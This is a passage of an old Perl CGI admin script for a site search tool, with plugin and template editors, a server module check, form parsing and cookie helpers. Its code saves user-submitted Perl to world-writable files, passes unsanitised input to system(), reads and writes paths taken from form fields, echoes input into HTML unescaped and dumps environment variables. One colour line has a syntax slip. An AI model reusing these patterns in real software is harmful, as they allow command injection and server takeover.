                  <FORM ACTION="$PROG_URL" METHOD="post">
                  Select Plugin: <SELECT NAME="plugin">
   |;

        
        foreach $plugin(sort keys %plugins) {
           print "<OPTION VALUE=\"$plugin\">$plugin\n";
        }
        print "<SELECT><BR><BR>\n";
        print "Create New Plugin: <INPUT NAME=\"new_plugin\"><BR><BR>\n";
        print "<INPUT NAME=\"action\" VALUE=\"Edit Plugin\" TYPE=\"hidden\">\n";
        print "<CENTER><INPUT VALUE=\"Edit Plugin\" TYPE=\"submit\"></CENTER>\n";

   print qq|

                  </FORM>
                  </FONT>
                </TD>
        </TR>
        </TR>
     </TABLE>
    </TD></TR></TABLE>
  </CENTER>
</BODY>
   |;

   exit 0;


}


sub Edit_Plugin {

   my ($code);
   my ($plugin) = $input{'plugin'};
   my ($new_plugin) = $input{'new_plugin'};

   if($new_plugin) { 
      $plugin = &Make_Alpha("$new_plugin"); 
      $code = "package IWEB;\n\n### Plugin: $plugin\n### Purpose:\n\nsub $plugin {\n\n}\n\n1;";
   }
   else {
      open(PLUGIN,"../custom/$plugin.pm");
          while(<PLUGIN>) { $code .= $_; }
      close(PLUGIN);
   }

   print "Content-Type: text/html\n\n";
   print qq|
<style type="text/css">A:hover {text-decoration: on; background-color: #DBDBDB; color: #000000;}</style>
<BODY BGCOLOR="#e0e0e0" LINK="maroon" VLINK="maroon" TEXT="black">
  <CENTER>
    <TABLE BGCOLOR="white" BORDER="1" CELLPADDING="3" WIDTH=500><TR><TD>
    <TABLE BORDER="0" CELLPADDING="3" WIDTH="100%">
        <TR BGCOLOR="#cccc99">
                <TD>
                   <FONT FACE="Verdana,Arial, Helvetica" SIZE="2" COLOR="#660000">
                   <b>Plugin Editor</b>
                </TD>
        </TR>
        <TR>
                <TD BGCOLOR="#EEEEEE" VALIGN="top">
                  <FONT FACE="Verdana,Arial, Helvetica" SIZE="2" COLOR="#000000">
                  <FORM ACTION="$PROG_URL" METHOD="post">
                  <B>Editing Plugin: $plugin</B><BR>
                  <CENTER>
                  <TEXTAREA NAME="code" COLS=60 ROWS=20>$code</TEXTAREA><BR>
                  <INPUT TYPE="hidden" NAME="plugin" VALUE="$plugin">
                  <INPUT TYPE="submit" NAME="action" VALUE="Save Plugin">
                  </CENTER>
                  </FORM>
                  <B>Need Help?  Read more on the <a href="$global{'html_dir'}/pluginapi.shtml">PLUGIN API</A></B><BR><BR>

                  <CENTER>
                  <B>Is this a killer plugin? <a href="$global{'html_dir'}/pluginsubmit.shtml">Contribute it to other Users!</A></B>
                  <BR>(Copy and paste your plugin into the form following this link)
                  </CENTER>
                  </FONT>
                </TD>
        </TR>
     </TABLE>
    </TD></TR></TABLE>
  </CENTER>
</BODY>
   |;

   exit 0;

}


sub Save_Plugin {

   my($pluginfile,$debug,$message);

   $pluginfile = "../custom/$input{'plugin'}.pm";

   $input{'code'} =~ s/\cM//g;

   open(FILE,">$pluginfile");
      print FILE $input{'code'};
   close(FILE);

   chmod 0777, "$pluginfile";
   system("perl -c $pluginfile 2> ../custom/debug.txt");


   open(DEBUG,"../custom/debug.txt");
      while(<DEBUG>) { $debug .= $_; }
   close(DEBUG);

   print "Content-Type: text/html\n\n";
   print qq|
<style type="text/css">A:hover {text-decoration: on; background-color: #DBDBDB; color: #000000;}</style>
<BODY BGCOLOR="#e0e0e0" LINK="maroon" VLINK="maroon" TEXT="black">
  <CENTER>
    <TABLE BGCOLOR="white" BORDER="1" CELLPADDING="3" WIDTH=500><TR><TD>
    <TABLE BORDER="0" CELLPADDING="3" WIDTH="100%">
        <TR BGCOLOR="#cccc99">
                <TD>
                   <FONT FACE="Verdana,Arial, Helvetica" SIZE="2" COLOR="#660000">
                   <b>Plugin Editor</b>
                </TD>
        </TR>
        <TR>
                <TD BGCOLOR="#EEEEEE" VALIGN="top">
                  <FONT FACE="Verdana,Arial, Helvetica" SIZE="2" COLOR="#000000">
                  Plugin: $input{'plugin'} saved.... checking syntax:<BR><BR>
                  <B><PRE>$debug</PRE></B>
                  </FONT>
                </TD>
        </TR>
        </TR>
     </TABLE>
    </TD></TR></TABLE>
  </CENTER>
</BODY>
   |;

   exit 0;

}


##############################################################################
#       __  __     __            __   ______ __
#      / / / /____/ /_____     _/_/  / ____// /_ _____
#     / /_/ // __  // ___/   _/_/   / /_   / __// ___/
#    / __  // /_/ // /     _/_/    / __/  / /_ / /
#   /_/ /_/ \__,_//_/     /_/     /_/     \__//_/
##############################################################################

sub Edit_File {

   my($file,$FILENAME,$OPEN,$cat,$DESC,$TEXT,$symbols,$fonts,$plugins,$tags,$colortable,@lines,$x,$n);

   $file = $input{'filename'};

   $FILENAME="$data_dir/templates/$file.txt";
   $OPEN="$data_dir/templates/$file.txt";

   if (! (-e $FILENAME)) { 
     $OPEN="$data_dir/templates/default.txt";
   }

   $cat = $file;
   $cat =~ s/_/ /g;

   $DESC = "Editing Template: <B>$cat</B><BR>(Read in from $OPEN)<BR><BR>";
   $DESC .= "If there was not a template already defined, we used the current default.  If you wish \n";
   $DESC .= "to remove this template, simply erase all of the text here and press the SAVE Button\n";


   $n='\r\n';
   open(FILE,"$OPEN");
     @lines = <FILE>;
     for $x(0 .. $#lines) {
        $TEXT .= $lines[$x];
     }
     $TEXT =~ s/\cM//g;
     $TEXT =~ s/\&/\&amp\;/g;
     $TEXT =~ s/\>/\&gt;/g;
     $TEXT =~ s/\</\&lt;/g;
   close(FILE);

   $symbols = &Symbol_List;
   $fonts = &Font_List;
   $plugins = &Plugin_List;
   $tags = &Tags;
   $colortable = &Colors;

print "Content-Type: text/html\n\n";
print qq|
    <SCRIPT LANGUAGE="javascript">
	    function Symbols() {
		    var text=document.html_form.source.value;
			var num = document.html_form.symbol.selectedIndex;
			var sval = document.html_form.symbol[num].text;
			if(num > 0) {
			   text = text + sval;
			   document.html_form.source.value=text;
			   document.html_form.source.focus();
			}
		}
		
	    function Font() {
		    var text=document.html_form.source.value;
			var num = document.html_form.font.selectedIndex;
			var sval = document.html_form.font[num].text;
			if(num > 0) {			
 			   text = text + "<FONT FACE='" + sval + "' SIZE='$global{'font_size'}' COLOR='$global{'text_color'}'>";
			   document.html_form.source.value=text;
			   document.html_form.source.focus();
			}			   
		}		

	    function Plugin() {
		    var text=document.html_form.source.value;
			var num = document.html_form.plugin.selectedIndex;
			var sval = document.html_form.plugin[num].value;
			if(num > 0) {
			   text = text + sval;
			   document.html_form.source.value=text;
			   document.html_form.source.focus();
			}
		}

	    function Tag() {
		    var text=document.html_form.source.value;
			var num = document.html_form.tag.selectedIndex;
			var sval = document.html_form.tag[num].value;
			if(num > 0) {
			   text = text + sval;
			   document.html_form.source.value=text;
			   document.html_form.source.focus();
			}
		}

	    function Color(c_value) {
		    var text=document.html_form.source.value;
			text = text + c_value;
			document.html_form.source.value=text;
			document.html_form.source.focus();
		}
				
	</SCRIPT>
	<FONT FACE="arial,helvetica" SIZE=-1>
        <BLOCKQUOTE><BLOCKQUOTE>$DESC</BLOCKQUOTE></BLOCKQUOTE>
	<CENTER>
    <FORM NAME="html_form" ACTION="$PROG_URL" METHOD="post">
	<TABLE BGCOLOR="black" BORDER=0 WIDTH=630 CELLSPACING=2 CELLPADDING=0><TR><TD>
	  <TABLE WIDTH=100% BORDER=0 BGCOLOR="#e0e0e0">
	    <TR><TD VALIGN="top" BGCOLOR="#cccc99">
		  <FONT FACE="arial,helvetica" SIZE=-1>
		    <H3>Template Editor</H3>
 	        $symbols
	        $fonts
	        $plugins
	        $tags
                <A HREF="$global{'html_dir'}/template_editor.html" TARGET="new"><IMG SRC="$global{'button_dir'}/help-icon.gif" BORDER=0></A>
	      </FONT>		  
		</TD></TR>
	    <TD VALIGN="top">
 		 <CENTER>
	     <TEXTAREA NAME="source" COLS=70 ROWS=25>$TEXT</TEXTAREA><BR>
                 <INPUT TYPE="hidden" NAME="password" VALUE="$password">
                 <INPUT TYPE="hidden" NAME="filename" VALUE="$FILENAME">
                 <INPUT TYPE="hidden" NAME="mode" VALUE="$input{'mode'}">
                 <INPUT TYPE="hidden" NAME="todo" VALUE="$input{'todo'}">
                 <CENTER><INPUT TYPE="submit" NAME="action" VALUE="Save File">
		 </CENTER>
	    </TD></TR>
	  </TABLE>
	</TD></TR></TABLE>
	</FORM>
    <B>Click to insert color...</B><BR>
    <TABLE BORDER="1" CELLSPACING="0" CELLPADDING="1">
      <TR>
        $colortable
      </TR>
    </TABLE>
  </CENTER>

  |;

        exit 0;


}



sub Save_File {
  
   my($FILENAME,$TEXT,$act,$todo,$build_rules,$entry);

    $FILENAME=$input{'filename'};

    $TEXT = $input{'source'};
    $TEXT =~ s/\cM//g;

    if (!($TEXT)) { 
        unlink($FILENAME); 
        $act = "Deleted";
    }
    else {
       open(FILE,">$FILENAME");
          print FILE "$TEXT";
       close(FILE);
       $act = "Saved";
    }

    if($input{'mode'} eq "hyperseek") {
       $todo=$input{'todo'};
       $build_rules = "$data_dir/hyperseek/build.rules";

       if ($FILENAME =~ "default") { $entry="ALL\n"; }
       elsif ($todo) { $entry = "$todo\n"; }
       
       if($entry) {
          ### Update Rules File ###
          open(RULES,">>$build_rules");
             print RULES $entry;
          close(RULES);
       }

    } 

    $TEXT =~ s/(<!--)/&lt;!--/g; 
    $TEXT =~ s/(-->)/--&gt;/g; 

    print "Content-Type: text/html\n\n";
    print qq!
    <HTML>
      <BR><BR><CENTER><H3>File ($FILENAME) $act.</H3>
      (Comments/Plugins shown as text below)
      <FORM><INPUT TYPE="button" VALUE="--- OK ---" onClick="history.go(-2);"></FORM><HR WIDTH=80%></CENTER>
      $TEXT
      </CENTER>
      </BODY>
    </HTML>
    !;

    exit 0;

}

sub Plugin_List {

   my $plugins=qq|
    <SELECT NAME="plugin" onChange="Plugin();">
      <OPTION>Plugins
      <OPTION VALUE="\n<!-- PLUGIN:BODY -->\n">PLUGIN:BODY
      <OPTION VALUE="\n<!-- PLUGIN:CATEGORIES -->\n">PLUGIN:CATEGORIES
      <OPTION VALUE="\n<!-- PLUGIN:MENU -->\n">PLUGIN:MENU
      <OPTION VALUE="\n<!-- PLUGIN:SEARCH -->\n">PLUGIN:SEARCH
      <OPTION VALUE="\n<!-- PLUGIN:SIMPLESEARCH -->\n">PLUGIN:SIMPLESEARCH
      <OPTION VALUE="\n<!-- PLUGIN:POWERSEARCH -->\n">PLUGIN:POWERSEARCH
      <OPTION VALUE="\n<!-- PLUGIN:BANNER -->\n">PLUGIN:BANNER
      <OPTION VALUE="\n<!-- PLUGIN:SPIDER -->\n">PLUGIN:SPIDER
      <OPTION VALUE="\n<!-- PLUGIN:OPTIN -->\n">PLUGIN:OPTIN
      <OPTION VALUE="\n<!-- PLUGIN:INLINE_CLASSIFIEDS -->\n">PLUGIN:INLINE_CLASSIFIEDS
      <OPTION VALUE="\n<!-- PLUGIN:HEADLINES -->\n">PLUGIN:HEADLINES
      <OPTION VALUE="\n<!-- PLUGIN:FEATURESITE -->\n">PLUGIN:FEATURESITE
	  
      <OPTION VALUE="<!-- PLUGIN:Long_Date -->">PLUGIN:Long_Date
      <OPTION VALUE="<!-- PLUGIN:US_Date -->">PLUGIN:US_Date
      <OPTION VALUE="<!-- PLUGIN:Short_Date -->">PLUGIN:Short_Date
      <OPTION VALUE="<!-- PLUGIN:REFERER -->">PLUGIN:REFERER
	  
      <OPTION VALUE="&lt;A HREF='<!-- PLUGIN:NEW -->'&gt;Your text here&lt;/A&gt;">PLUGIN:NEW
      <OPTION VALUE="&lt;A HREF='<!-- PLUGIN:ADD_URL -->'&gt;Your text here&lt;/A&gt;">PLUGIN:ADD_URL
      <OPTION VALUE="&lt;A HREF='<!-- PLUGIN:TOP10 -->'&gt;Your text here&lt;/A&gt;">PLUGIN:TOP10
      <OPTION VALUE="&lt;A HREF='<!-- PLUGIN:TOPSEARCHES -->'&gt;Your text here&lt;/A&gt;">PLUGIN:TOPSEARCHES
      <OPTION VALUE="&lt;A HREF='<!-- PLUGIN:TOPHITS -->'&gt;Your text here&lt;/A&gt;">PLUGIN:TOPHITS
      <OPTION VALUE="&lt;A HREF='<!-- PLUGIN:RECENTHITS -->'&gt;Your text here&lt;/A&gt;">PLUGIN:RECENTHITS
      <OPTION VALUE="&lt;A HREF='<!-- PLUGIN:RECENTSEARCHES -->'&gt;Your text here&lt;/A&gt;">PLUGIN:RECENTSEARCHES
      <OPTION VALUE="&lt;A HREF='<!-- PLUGIN:RATEREPORT -->'&gt;Your text here&lt;/A&gt;">PLUGIN:RATEREPORT
      <OPTION VALUE="\n<!-- PLUGIN:TOTALLINKS -->\n">PLUGIN:TOTALLINKS
      <OPTION VALUE="&lt;A HREF='<!-- PLUGIN:RANDOM -->'&gt;Your text here&lt;/A&gt;">PLUGIN:RANDOM
      <OPTION VALUE="&lt;A HREF='<!-- PLUGIN:COOL -->'&gt;Your text here&lt;/A&gt;">PLUGIN:COOL
      <OPTION VALUE="&lt;A HREF='<!-- PLUGIN:FORUM -->'&gt;Your text here&lt;/A&gt;">PLUGIN:FORUM
      <OPTION VALUE="&lt;A HREF='<!-- PLUGIN:FS_NEXT -->'&gt;Your text here&lt;/A&gt;">PLUGIN:FS_NEXT
      <OPTION VALUE="&lt;A HREF='<!-- PLUGIN:FS_PREVIOUS -->'&gt;Your text here&lt;/A&gt;">PLUGIN:FS_PREVIOUS
      <OPTION VALUE="&lt;A HREF='<!-- PLUGIN:COMMENTS -->'&gt;Your text here&lt;/A&gt;">PLUGIN:COMMENTS
      <OPTION VALUE="&lt;A HREF='<!-- PLUGIN:RECOMMEND -->'&gt;Your text here&lt;/A&gt;">PLUGIN:RECOMMEND
      <OPTION VALUE="&lt;A HREF='<!-- PLUGIN:DEAD -->'&gt;Your text here&lt;/A&gt;">PLUGIN:DEAD
      <OPTION VALUE="&lt;A HREF='<!-- PLUGIN:HELP -->'&gt;Your text here&lt;/A&gt;">PLUGIN:HELP
      <OPTION VALUE="&lt;A HREF='<!-- PLUGIN:MORELINKS -->'&gt;Your text here&lt;/A&gt;">PLUGIN:MORELINKS

      <OPTION VALUE="<!-- PLUGIN:CUSTOM:Your_Function_Name -->">PLUGIN:CUSTOM
      <OPTION VALUE="<!-- PLUGIN:META -->">PLUGIN:META
      <OPTION VALUE="<!-- PLUGIN:TITLE -->">PLUGIN:TITLE

    </SELECT>
    |;

    return($plugins);

}

sub Font_List {

   my $fonts=qq|
    <SELECT NAME="font" onChange="Font();">
     <OPTION>Font
     <OPTION>Arial,Helvetica
     <OPTION>Tahoma,Helvetica
     <OPTION>Verdana,Helvetica
     <OPTION>Times Roman
     <OPTION>MS Comic Sans Serif
     <OPTION>Courier
    </SELECT>
   |;

   return($fonts);
}


sub Tags {

   my $tags=qq|
    <SELECT NAME="tag" onChange="Tag();">
     <OPTION>HTML Tags
     <OPTION VALUE="&lt;H1&gt; &lt;/H1&gt;">H1
     <OPTION VALUE="&lt;H2&gt; &lt;/H2&gt;">H2
     <OPTION VALUE="&lt;H3&gt; &lt;/H3&gt;">H3
     <OPTION VALUE="&lt;H4&gt; &lt;/H4&gt;">H4
     <OPTION VALUE="&lt;B&gt; &lt;/B&gt;">BOLD
     <OPTION VALUE="&lt;U&gt; &lt;/U&gt;">Underline
     <OPTION VALUE="&lt;I&gt; &lt;/I&gt;">Italics
     <OPTION VALUE="&lt;BLOCKQUOTE&gt;\n&lt;/BLOCKQUOTE&gt;">Blockquote
     <OPTION VALUE="&lt;IMG SRC='/path/to/image.gif'&gt;">Image
     <OPTION VALUE="&lt;CENTER&gt; &lt;/CENTER&gt;">Center
     <OPTION VALUE="&lt;P ALIGN='left'&gt; &lt;/P&gt;">Align Left
     <OPTION VALUE="&lt;P ALIGN='right'&gt; &lt;/P&gt;">Align Right
    </SELECT>
   |;

   return($tags);
}

sub Symbol_List {

   my $symbols=qq|
   <SELECT NAME="symbol" onChange="Symbols();">
     <OPTION>Symbol
     <OPTION>&quot;
     <OPTION>&amp
     <OPTION>&lt;
     <OPTION>&gt;
	 
	 <!--
     <OPTION>&euro;
     <OPTION>&fnof;
     <OPTION>&hellip;
     <OPTION>&dagger;
     <OPTION>&Dagger;
     <OPTION>&permil;
     <OPTION>&Scaron;
     <OPTION>&OElig;
     <OPTION>&bull;
     <OPTION>&mdash;
     <OPTION>&trade;
     <OPTION>&scaron;
     <OPTION>&rsaquo;
     <OPTION>&oelig;
     <OPTION>&Yuml;
	 -->
	 
     <OPTION>&nbsp;
     <OPTION>&iexcl;
     <OPTION>&cent;
     <OPTION>&pound;
     <OPTION>&curren;
     <OPTION>&yen;
     <OPTION>&brvbar;
     <OPTION>&sect;
     <OPTION>&copy;
     <OPTION>&laquo;
     <OPTION>&not;
     <OPTION>&reg;
     <OPTION>&deg;
     <OPTION>&plusmn;
     <OPTION>&sup2;
     <OPTION>&sup3;
     <OPTION>&acute;
     <OPTION>&micro;
     <OPTION>&para;
     <OPTION>&middot;
     <OPTION>&sup1;
     <OPTION>&raquo;
     <OPTION>&frac14;
     <OPTION>&frac12;
     <OPTION>&frac34;
     <OPTION>&iquest;
     <OPTION>&Agrave;
     <OPTION>&times;
     <OPTION>&Oslash;
     <OPTION>&szlig;
     <OPTION>&divide;
    </SELECT>
   |;

   return($symbols);
   
}


sub Colors {

   my (@cl,$colortable,$x,$color);

   push @cl,"#000000";
   push @cl,"#003300";
   push @cl,"#006600";
   push @cl,"#009900";
   push @cl,"#00cc00";
   push @cl,"#00ff00";
   push @cl,"#000033";
   push @cl,"#003333";
   push @cl,"#006633";
   push @cl,"#009933";
   push @cl,"#00cc33";
   push @cl,"#00ff33";
   push @cl,"#000066";
   push @cl,"#003366";
   push @cl,"#006666";
   push @cl,"#009966";
   push @cl,"#00cc66";
   push @cl,"#00ff66";
   push @cl,"#000099";
   push @cl,"#003399";
   push @cl,"#006699";
   push @cl,"#009999";
   push @cl,"#00cc99";
   push @cl,"#00ff99";
   push @cl,"#0000cc";
   push @cl,"#0033cc";
   push @cl,"#0066cc";
   push @cl,"#0099cc";
   push @cl,"#00cccc";
   push @cl,"#00ffcc";
   push @cl,"#0000ff";
   push @cl,"#0033ff";
   push @cl,"#0066ff";
   push @cl,"#0099ff";
   push @cl,"#00ccff";
   push @cl,"#00ffff";
   push @cl,"#330000";
   push @cl,"#333300";
   push @cl,"#336600";
   push @cl,"#339900";
   push @cl,"#33cc00";
   push @cl,"#33ff00";
   push @cl,"#330033";
   push @cl,"#333333";
   push @cl,"#336633";
   push @cl,"#339933";
   push @cl,"#33cc33";
   push @cl,"#33ff33";
   push @cl,"#330066";
   push @cl,"#333366";
   push @cl,"#336666";
   push @cl,"#339966";
   push @cl,"#33cc66";
   push @cl,"#33ff66";
   push @cl,"#330099";
   push @cl,"#333399";
   push @cl,"#336699";
   push @cl,"#339999";
   push @cl,"#33cc99";
   push @cl,"#33ff99";
   push @cl,"#3300cc";
   push @cl,"#3333cc";
   push @cl,"#3366cc";
   push @cl,"#3399cc";
   push @cl,"#33cccc";
   push @cl,"#33ffcc";
   push @cl,"#3300ff";
   push @cl,"#3333ff";
   push @cl,"#3366ff";
   push @cl,"#3399ff";
   push @cl,"#33ccff";
   push @cl,"#660000";
   push @cl,"#663300";
   push @cl,"#666600";
   push @cl,"#669900";
   push @cl,"#66cc00";
   push @cl,"#66ff00";
   push @cl,"#660033";
   push @cl,"#663333";
   push @cl,"#666633";
   push @cl,"#669933";
   push @cl,"#66cc33";
   push @cl,"#66ff33";
   push @cl,"#660066";
   push @cl,"#663366";
   push @cl,"#666666";
   push @cl,"#669966";
   push @cl,"#66cc66";
   push @cl,"#66ff66";
   push @cl,"#660099";
   push @cl,"#663399";
   push @cl,"#666699";
   push @cl,"#669999";
   push @cl,"#66cc99";
   push @cl,"#66ff99";
   push @cl,"#6600cc";
   push @cl,"#6633cc";
   push @cl,"#6666cc";
   push @cl,"#6699cc";
   push @cl,"#66cccc";
   push @cl,"#66ffcc";
   push @cl,"#6600ff";
   push @cl,"#6633ff";
   push @cl,"#6666ff";
   push @cl,"#6699ff";
   push @cl,"#66ccff";
   push @cl,"#66ffff";
   push @cl,"#990000";
   push @cl,"#993300";
   push @cl,"#996600";
   push @cl,"#999900";
   push @cl,"#99cc00";
   push @cl,"#99ff00";
   push @cl,"#990033";
   push @cl,"#993333";
   push @cl,"#996633";
   push @cl,"#999933";
   push @cl,"#99cc33";
   push @cl,"#99ff33";
   push @cl,"#990066";
   push @cl,"#993366";
   push @cl,"#996666";
   push @cl,"#999966";
   push @cl,"#99cc66";
   push @cl,"#99ff66";
   push @cl,"#990099";
   push @cl,"#993399";
   push @cl,"#996699";
   push @cl,"#999999";
   push @cl,"#99cc99";
   push @cl,"#99ff99";
   push @cl,"#9900cc";
   push @cl,"#9933cc";
   push @cl,"#9966cc";
   push @cl,"#9999cc";
   push @cl,"#99cccc";
   push @cl,"#99ffcc";
   push @cl,"#9900ff";
   push @cl,"#9933ff";
   push @cl,"#9966ff";
   push @cl,"#9999ff";
   push @cl,"#99ccff";
   push @cl,"#99ffff";
   push @cl,"#cc0000";
   push @cl,"#cc3300";
   push @cl,"#cc6600";
   push @cl,"#cc9900";
   push @cl,"#cccc00";
   push @cl,"#ccff00";
   push @cl,"#cc0033";
   push @cl,"#cc3333";
   push @cl,"#cc6633";
   push @cl,"#cc9933";
   push @cl,"#cccc33";
   push @cl,"#ccff33";
   push @cl,"#cc0066";
   push @cl,"#cc3366";
   push @cl,"#cc6666";
   push @cl,"#cc9966";
   push @cl,"#cccc66";
   push @cl,"#ccff66";
   push @cl,"#cc0099";
   push @cl,"#cc3399";
   push @cl,"#cc6699";
   push @cl,"#cc9999";
   push @cl,"#cccc99";
   push @cl,"#ccff99";
   push @cl,"#cc00cc";
   push @cl,"#cc33cc";
   push @cl,"#cc66cc";
   push @cl,"#cc99cc";
   push @cl,"#cccccc";
   push @cl,"#ccffcc";
   push @cl,"#cc00ff";
   push @cl,"#cc33ff";
   push @cl,"#cc66ff";
   push @cl,"#cc99ff";
   push @cl,"#ccccff";
   push @cl,"#ccffff";
   push @cl,"#ff0000";
   push @cl,"#ff3300";
   push @cl,"#ff6600";
   push @cl,"#ff9900";
   push @cl,"#ffcc00";
   push @cl,"#ffff00";
   push @cl,"#ff0033";
   push @cl,"#ff3333";
   push @cl,"#ff6633";
   push @cl,"#ff9933";
   push @cl,"#ffcc33";
   push @cl,"#ffff33";
   push @cl,"#ff0066";
   push @cl,"#ff3366";
   push @cl,"#ff6666";
   push @cl,"#ff9966";
   push @cl,"#ffcc66";
   push @cl,"#ffff66";
   push @cl,"#ff0099";
   push @cl,"#ff3399";
   push @cl,"#ff6699";
   push @cl,"#ff9999";
   push @cl,"#ffcc99";
   push @cl,"#ffff99";
   push @cl,"#ff00cc";
   push @cl,"#ff33cc";
   push @cl,"#ff66cc";
   push @cl,"#ff99cc";
   push @cl,"#ffcccc";
   push @cl,"#ffffcc";
   push @cl,"#ff00ff";
   push @cl,"#ff33ff";
   push @cl,"#ff66ff";
   push @cl,"#ff99ff";
   push @cl,"#ffccff";
   push @cl,"#ffffff";
   push @cl,"aqua";
   push @cl,"gray">
   push @cl,"navy";
   push @cl,"silver";
   push @cl,"black";
   push @cl,"green";
   push @cl,"olive";
   push @cl,"teal";
   push @cl,"blue";
   push @cl,"lime";
   push @cl,"purple";
   push @cl,"white";
   push @cl,"fuchsia";
   push @cl,"maroon";
   push @cl,"red";
   push @cl,"yellow";

   $x=0;
   foreach $color(@cl) {
      $x++;
      $colortable .= "<TD BGCOLOR=\"$color\"><A HREF=\"javascript:Color('$color');\">&nbsp;&nbsp;&nbsp;</a></TD>\n";
      if($x == 36) { $colortable .= "</TR><TR>"; $x=0; }
   }

   return($colortable);

}

sub Module_Test {

   my($ERROR);

   $ERROR = "Testing for presence of required perl libraries...<HR><BR>\n";

   ## File::Copy
   eval "use File::Copy";
   if ($@) {
       $ERROR .= "File::Copy <font color=red>not accessible</font> from this server. This can cause administrative problems !!!.<BR><BR>";
   }
   else { $ERROR .= "File::Copy <font color=blue>present</font>.<BR><BR>"; }

   ## cwd
   eval "use Cwd";
   if ($@) {
       $ERROR .= "Cwd <font color=red>not accessible</font> from this server. This can cause directory lookup problems !!!.<BR><BR>";
   }
   else {
       my $pathname = cwd;
       $ERROR .= "Cwd <font color=blue>present</font>. (Feels like current path is $pathname ???)<BR><BR>"; 
   }



   ## DB_File
   eval "use DB_File";
   if ($@) {
       $ERROR .= "DB_File <font color=red>not accessible</font> from this server. You must use an <b>ascii</b> database.<BR><BR>";
   }
   else { $ERROR .= "DB_File <font color=blue>present</font>, you may use the binary database format.<BR><BR>"; }


   ## DBI
   eval "use DBI";
   if ($@) {
       $ERROR .= "DBI <font color=red>not accessible</font> from this server. You may not use the SQL Database<BR><BR>";
   }
   else { $ERROR .= "DBI <font color=blue>present</font>.... SQL OK<BR><BR>"; }


   ## DBD::mysql
   eval "use DBD::mysql";
   if ($@) {
       $ERROR .= "DBD::mysql <font color=red>not accessible</font> from this server. You may not use the mySQL Database<BR><BR>";
   }
   else { $ERROR .= "DBD::mysql <font color=blue>present</font>.... mySQL OK<BR><BR>"; }

   $ERROR .= "<HR>\n";

   $ERROR .= "<B>Perl</B> version: $]<BR>\n";
   $ERROR .= "<B>Running on</B>: $^O<BR>\n";

   $ERROR .= "<HR>\n";
   $ERROR .= "<B>Directory:</B> $directory<BR>\n";

   $ERROR .= "<HR>\n";
   $ERROR .= "<B>Environment:</B><BR>\n";


   foreach $key(keys %ENV) { $ERROR .= "<B>$key:</B> <I>$ENV{$key}</I><BR>\n"; }

   print "Content-Type: text/html\n\n";
   print qq!

<BODY BGCOLOR="#e0e0e0" LINK="maroon" VLINK="maroon" TEXT="black">
  <CENTER>
    <TABLE BGCOLOR="white" BORDER="1" CELLPADDING="3" WIDTH=85%><TR><TD>
    <TABLE BORDER="0" CELLPADDING="3" WIDTH="100%">
        <TR BGCOLOR="#cccc99">
                <TD>
                   <FONT FACE="Verdana,Arial, Helvetica" SIZE="2" COLOR="#660000">
                   <b>System Configuration Summary</b>
                </TD>
        </TR>
        <TR>
                <TD BGCOLOR="#EEEEEE" VALIGN="top">
                  <FONT FACE="Verdana,Arial, Helvetica" SIZE="2" COLOR="#000000">
                  $ERROR
                  </FONT>
                </TD>
        </TR>
        </TR>
     </TABLE>
    </TD></TR></TABLE>
  </CENTER>
</BODY>
   !;
   exit 0;
}


sub Admin_Help {

   my $Topic = $input{'topic'};
   my $URL = "$global{'html_dir'}/admin_help.cgi?topic=$Topic";

   print "Location: $URL\n\n";

   exit 0;

}


##############################################################################
#                    ____                      _
#                   / __ \ ____ _ _____ _____ (_)____   ____ _
#                  / /_/ // __ `// ___// ___// // __ \ / __ `/
#                 / ____// /_/ // /   (__  )/ // / / // /_/ /
#                /_/     \__,_//_/   /____//_//_/ /_/ \__, /
#                                                    /____/
#
##############################################################################
sub parse_form{

  my($buffer,$name,$value,$encoded_value,$pair);

  read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
  if (length($buffer) < 5) {
     $buffer = $ENV{QUERY_STRING};
  }
  my @pairs=split(/&/,$buffer);
  foreach $pair(@pairs) {
     ($name, $value)=split(/=/,$pair);
     $encoded_value = $value;
     $value =~ tr/+/ /;
     $value =~ s/%([a-fA-F0-9][A-F0-9])/pack("C",hex($1))/eg;
     if($input{$name} eq "") {
	$input{$name} = $value;
	$ENCODED{$name} = $encoded_value;
        push (@Fields,$name);
     }
     else {
  	$input{$name} = $input{$name}." ".$value;
     }
  }

}


##############################################################################
#                    ______               __    _
#                   / ____/____   ____   / /__ (_)___   _____
#                  / /    / __ \ / __ \ / //_// // _ \ / ___/
#                 / /___ / /_/ // /_/ // ,<  / //  __/(__  )
#                 \____/ \____/ \____//_/|_|/_/ \___//____/
#
##############################################################################
   ## Sample code to set a cookie....
   ## Note: separate cookie values with a ":"
   #  $newcookie= "voted\~Yes:iscool\~No";
   #  print "Set-Cookie: COOKIENAME=$newcookie;";
   #  print " expires=", &Cookie_Date( time + 31536000 , 1 ), "; path=/\n";

   ## Sample code to get a cookie
   #  %bbscookie= &split_cookie( $ENV{ 'HTTP_COOKIE' }, 'COOKIENAME' );
   #  $bbscookie{'voted'} and $bbscookie{'cool'} are the values...

sub split_cookie {

   # put cookie into array
   my( $incookie, $tag )= @_;
   my( %cookie,$tester,@temp,$temp,$temp2 );

   $tester= $incookie;
   @temp = split( /; /, $incookie );
   foreach ( @temp ) {
      ( $temp, $temp2 )= split( /=/ );
      $cookie{$temp}= $temp2;
   }
   return &split_sub_cookie( $cookie{$tag} );
}

sub split_sub_cookie {
   my( $cookie )= @_;
   my( %newcookie,@temp,$temp,$temp2 );
   @temp = split( /\|/, $cookie );
   foreach ( @temp ) {
      ( $temp, $temp2 )= split( /~/ );
      $newcookie{ $temp }= $temp2;
   }
   return %newcookie;
}

sub join_cookie {
   my( %set )= @_;
   my( $newcookie, $key );
   foreach $key( keys %set ) {
      $newcookie.= "$key\~$set{ $key }:";
   }
   return $newcookie;
}

sub Cookie_Date {

   my( $time, $format )= @_;

   my( $sec, $min, $hour, $mday, $mon, $year,
          $wday, $yday, $isdst )= localtime( $time );

   $sec = "0$sec" if ($sec < 10);
   $min = "0$min" if ($min < 10);
   $hour = "0$hour" if ($hour < 10);

   $mday = "0$mday" if ($mday < 10);

   my( $month )= ($mon + 1);
   $month = "0$month" if ($month < 10);

   $year = $year + 1900;

   my( @months )= ( "Jan", "Feb", "Mar", "Apr", "May", "Jun",
                       "Jul", "Aug", "Sep", "Oct", "Nov", "Dec" );

   my( @weekday )=( "Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat" );

   return "$weekday[$wday], $month-$mday-$year $hour\:$min\:$sec GMT";
}


sub Make_Alpha {

  ## This returns a reformatted string
  ## Example:  $mystring = &Make_Alpha($mystring);

